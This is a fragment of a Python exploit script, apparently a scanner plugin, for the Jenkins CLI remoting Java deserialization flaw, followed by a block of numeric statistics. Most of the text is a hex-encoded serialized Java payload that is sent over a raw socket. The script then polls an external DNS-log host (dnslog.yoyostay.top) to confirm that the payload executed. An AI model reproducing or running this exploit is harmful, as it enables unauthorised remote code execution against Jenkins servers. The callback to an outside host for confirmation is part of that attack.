payload = '\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e' + payload_b64 + '\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29'
sock.send(payload)
time.sleep(5)
req = urllib2.Request("http://dnslog.yoyostay.top/web/devil/%s/" %ramdmum);
reqopen = urllib2.urlopen(req)
if 'True' in reqopen.read():
return info
except:
pass
| 381.559322
| 17,791
| 0.770389
| 4,671
| 22,512
| 3.707771
| 0.056733
| 0.058895
| 0.058722
| 0.078296
| 0.711069
| 0.701195
| 0.692881
| 0.678503
| 0.674693
| 0.660835
| 0
| 0.45464
| 0.020211
| 22,512
| 58
| 17,792
| 388.137931
| 0.330553
| 0.001599
| 0
| 0.04
| 0
| 0.06
| 0.936101
| 0.926089
| 0
| 1
| 0
| 0
| 0
| 1
| 0.06
| false
| 0.02
| 0.14
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
